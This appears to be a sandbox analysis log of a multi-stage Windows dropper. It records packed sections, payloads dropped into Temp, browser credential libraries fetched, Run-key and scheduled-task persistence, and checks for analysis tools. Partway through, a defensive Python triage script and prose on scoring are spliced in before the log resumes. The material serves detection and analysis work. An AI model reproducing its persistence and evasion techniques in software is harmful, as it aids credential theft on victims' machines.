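Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Section loaded: ncrypt.dll
"""


def parse_rows(text):
    """Map each process path to the ordered list of modules it loaded."""
    procs = OrderedDict()
    for line in text.splitlines():
        m = ROW.search(line)
        if m:
            procs.setdefault(m["proc"], []).append(m["dll"].lower())
    return procs


def triage(procs):
    """Score each process on its loads; highest score first (stable on ties)."""
    findings = []
    for proc, loads in procs.items():
        distinct = list(OrderedDict.fromkeys(loads))      # dedupe, keep load order
        hits = [d for d in distinct if d in INDICATORS]
        from_temp = TEMP_DIR in proc.lower()              # executing out of %TEMP%
        score = sum(INDICATORS[d][0] for d in hits) + (2 if from_temp else 0)
        findings.append({
            "process": proc,
            "from_temp": from_temp,
            "load_events": len(loads),
            "distinct_modules": len(distinct),
            "resolution_rounds": loads.count(NSP_CHAIN_HEAD),
            "indicators": hits,
            "score": score,
        })
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for f in triage(parse_rows(SAMPLE_ROWS)):
        print(f"{f['score']:>2}  {f['process']}")
        print(f"    temp={f['from_temp']} events={f['load_events']} dns_rounds={f['resolution_rounds']}")
        for d in f["indicators"]:
            print(f"    {d}: {INDICATORS[d][1]}")
```

Module loads alone misfire on living-off-the-land binaries: taskkill.exe legitimately pulls in wbemcomn.dll and amsi.dll for its WMI-based process enumeration, which is why it scores low here and why the execution path carries weight. On the full list above the same logic ranks fc1511c233.exe (WinHTTP, SChannel, DPAPI, WMI) and 6ae2430bb1.exe (Restart Manager, WinINet, CNG) at the top and attributes the long run of repeated rows to a dozen name-resolution rounds by 1b3b76c439.exe.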
Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oswdvyxj:EW;yfjgjzwe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oswdvyxj:EW;yfjgjzwe:EW;.taggant:EW;
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Unpacked PE file: 21.2.EBFBFBFIIJ.exe.ed0000.0.unpack :EW;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 22.2.skotes.exe.880000.0.unpack :EW;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Unpacked PE file: 25.2.rhnew.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bilyxzuf:EW;mhmmcaro:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bilyxzuf:EW;mhmmcaro:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Unpacked PE file: 26.2.e6d73861f4.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gmfbtxnb:EW;sbnkbdwx:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Unpacked PE file: 27.2.fc1511c233.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;madnojdh:EW;rbwziktc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;madnojdh:EW;rbwziktc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Unpacked PE file: 28.2.6ae2430bb1.exe.8b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oswdvyxj:EW;yfjgjzwe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oswdvyxj:EW;yfjgjzwe:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Unpacked PE file: 32.2.fc1511c233.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;madnojdh:EW;rbwziktc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;madnojdh:EW;rbwziktc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 34.2.skotes.exe.880000.0.unpack :EW;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;rzhrxold:EW;uyfmouti:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C973480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C973480
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: f9882ce6c1.exe.22.dr | Static PE information: real checksum: 0x2c0cbf should be: 0x2ccfac
Source: EBFBFBFIIJ.exe.0.dr | Static PE information: real checksum: 0x322318 should be: 0x328eb6
Source: rhnew[1].exe.22.dr | Static PE information: real checksum: 0x1c2a68 should be: 0x1c6289
Source: random[1].exe.0.dr | Static PE information: real checksum: 0x322318 should be: 0x328eb6
Source: random[2].exe0.22.dr | Static PE information: real checksum: 0x2c0cbf should be: 0x2ccfac
Source: random[1].exe0.22.dr | Static PE information: real checksum: 0x1c059f should be: 0x1c40ce
Source: fc1511c233.exe.22.dr | Static PE information: real checksum: 0x1c059f should be: 0x1c40ce
Source: random[2].exe.22.dr | Static PE information: real checksum: 0x1bd493 should be: 0x1c977d
Source: rhnew.exe.22.dr | Static PE information: real checksum: 0x1c2a68 should be: 0x1c6289
Source: random[1].exe.22.dr | Static PE information: real checksum: 0x1dfbaa should be: 0x1d86b1
Source: file.exe | Static PE information: real checksum: 0x1bd493 should be: 0x1c977d
Source: e6d73861f4.exe.22.dr | Static PE information: real checksum: 0x1dfbaa should be: 0x1d86b1
Source: 6ae2430bb1.exe.22.dr | Static PE information: real checksum: 0x1bd493 should be: 0x1c977d
Source: skotes.exe.21.dr | Static PE information: real checksum: 0x322318 should be: 0x328eb6
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: oswdvyxj
Source: file.exe | Static PE information: section name: yfjgjzwe
Source: file.exe | Static PE information: section name: .taggant
Source: nss3.dll.0.dr | Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr | Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr | Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr | Static PE information: section name: .00cfg
Source: random[1].exe.0.dr | Static PE information: section name:
Source: random[1].exe.0.dr | Static PE information: section name: .idata
Source: random[1].exe.0.dr | Static PE information: section name: rzhrxold
Source: random[1].exe.0.dr | Static PE information: section name: uyfmouti
Source: random[1].exe.0.dr | Static PE information: section name: .taggant
Source: EBFBFBFIIJ.exe.0.dr | Static PE information: section name:
Source: EBFBFBFIIJ.exe.0.dr | Static PE information: section name: .idata
Source: EBFBFBFIIJ.exe.0.dr | Static PE information: section name: rzhrxold
Source: EBFBFBFIIJ.exe.0.dr | Static PE information: section name: uyfmouti
Source: EBFBFBFIIJ.exe.0.dr | Static PE information: section name: .taggant
Source: freebl3.dll.0.dr | Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr | Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr | Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr | Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr | Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr | Static PE information: section name: .didat
Source: skotes.exe.21.dr | Static PE information: section name:
Source: skotes.exe.21.dr | Static PE information: section name: .idata
Source: skotes.exe.21.dr | Static PE information: section name: rzhrxold
Source: skotes.exe.21.dr | Static PE information: section name: uyfmouti
Source: skotes.exe.21.dr | Static PE information: section name: .taggant
Source: rhnew[1].exe.22.dr | Static PE information: section name:
Source: rhnew[1].exe.22.dr | Static PE information: section name: .idata
Source: rhnew[1].exe.22.dr | Static PE information: section name:
Source: rhnew[1].exe.22.dr | Static PE information: section name: bilyxzuf
Source: rhnew[1].exe.22.dr | Static PE information: section name: mhmmcaro
Source: rhnew[1].exe.22.dr | Static PE information: section name: .taggant
Source: rhnew.exe.22.dr | Static PE information: section name:
Source: rhnew.exe.22.dr | Static PE information: section name: .idata
Source: rhnew.exe.22.dr | Static PE information: section name:
Source: rhnew.exe.22.dr | Static PE information: section name: bilyxzuf
Source: rhnew.exe.22.dr | Static PE information: section name: mhmmcaro
Source: rhnew.exe.22.dr | Static PE information: section name: .taggant
                          Source: random[1].exe.22.drStatic PE information: section name:
                          Source: random[1].exe.22.drStatic PE information: section name: .idata
                          Source: random[1].exe.22.drStatic PE information: section name:
                          Source: random[1].exe.22.drStatic PE information: section name: gmfbtxnb
                          Source: random[1].exe.22.drStatic PE information: section name: sbnkbdwx
                          Source: random[1].exe.22.drStatic PE information: section name: .taggant
                          Source: e6d73861f4.exe.22.drStatic PE information: section name:
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: .idata
                          Source: e6d73861f4.exe.22.drStatic PE information: section name:
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: gmfbtxnb
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: sbnkbdwx
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: .taggant
                          Source: random[1].exe0.22.drStatic PE information: section name:
                          Source: random[1].exe0.22.drStatic PE information: section name: .idata
                          Source: random[1].exe0.22.drStatic PE information: section name:
                          Source: random[1].exe0.22.drStatic PE information: section name: madnojdh
                          Source: random[1].exe0.22.drStatic PE information: section name: rbwziktc
                          Source: random[1].exe0.22.drStatic PE information: section name: .taggant
                          Source: fc1511c233.exe.22.drStatic PE information: section name:
                          Source: fc1511c233.exe.22.drStatic PE information: section name: .idata
                          Source: fc1511c233.exe.22.drStatic PE information: section name:
                          Source: fc1511c233.exe.22.drStatic PE information: section name: madnojdh
                          Source: fc1511c233.exe.22.drStatic PE information: section name: rbwziktc
                          Source: fc1511c233.exe.22.drStatic PE information: section name: .taggant
                          Source: random[2].exe.22.drStatic PE information: section name:
                          Source: random[2].exe.22.drStatic PE information: section name: .idata
                          Source: random[2].exe.22.drStatic PE information: section name:
                          Source: random[2].exe.22.drStatic PE information: section name: oswdvyxj
                          Source: random[2].exe.22.drStatic PE information: section name: yfjgjzwe
                          Source: random[2].exe.22.drStatic PE information: section name: .taggant
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name:
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: .idata
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name:
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: oswdvyxj
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: yfjgjzwe
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: .taggant
                          Source: random[2].exe0.22.drStatic PE information: section name:
                          Source: random[2].exe0.22.drStatic PE information: section name: .idata
                          Source: random[2].exe0.22.drStatic PE information: section name: ixufepqn
                          Source: random[2].exe0.22.drStatic PE information: section name: zktzdkxq
                          Source: random[2].exe0.22.drStatic PE information: section name: .taggant
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name:
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: .idata
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: ixufepqn
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: zktzdkxq
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9AB536 push ecx; ret 0_2_6C9AB549
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00EED91C push ecx; ret 21_2_00EED92F
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeCode function: 21_2_00EE1359 push es; ret 21_2_00EE135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_0089D91C push ecx; ret 22_2_0089D92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 22_2_0089DFC6 push ecx; ret 22_2_0089DFD9
                          Source: file.exeStatic PE information: section name: oswdvyxj entropy: 7.9524320953649505
                          Source: random[1].exe.0.drStatic PE information: section name: entropy: 7.150492851188311
                          Source: EBFBFBFIIJ.exe.0.drStatic PE information: section name: entropy: 7.150492851188311
                          Source: skotes.exe.21.drStatic PE information: section name: entropy: 7.150492851188311
                          Source: rhnew[1].exe.22.drStatic PE information: section name: entropy: 7.966923946029537
                          Source: rhnew[1].exe.22.drStatic PE information: section name: bilyxzuf entropy: 7.953103309270847
                          Source: rhnew.exe.22.drStatic PE information: section name: entropy: 7.966923946029537
                          Source: rhnew.exe.22.drStatic PE information: section name: bilyxzuf entropy: 7.953103309270847
                          Source: random[1].exe.22.drStatic PE information: section name: gmfbtxnb entropy: 7.936788997233131
                          Source: e6d73861f4.exe.22.drStatic PE information: section name: gmfbtxnb entropy: 7.936788997233131
                          Source: random[1].exe0.22.drStatic PE information: section name: entropy: 7.978695116148034
                          Source: random[1].exe0.22.drStatic PE information: section name: madnojdh entropy: 7.953351845179029
                          Source: fc1511c233.exe.22.drStatic PE information: section name: entropy: 7.978695116148034
                          Source: fc1511c233.exe.22.drStatic PE information: section name: madnojdh entropy: 7.953351845179029
                          Source: random[2].exe.22.drStatic PE information: section name: oswdvyxj entropy: 7.9524320953649505
                          Source: 6ae2430bb1.exe.22.drStatic PE information: section name: oswdvyxj entropy: 7.9524320953649505
                          Source: random[2].exe0.22.drStatic PE information: section name: entropy: 7.8100154622136255
                          Source: f9882ce6c1.exe.22.drStatic PE information: section name: entropy: 7.8100154622136255

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\Documents\EBFBFBFIIJ.exe
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1012283001\f9882ce6c1.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\rhnew[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe
Source: C:\Users\user\Desktop\file.exe | File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1b3b76c439.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6ae2430bb1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fc1511c233.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f9882ce6c1.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9D55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6C9D55F0
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Process information set: NOOPENFILEERRORBOX
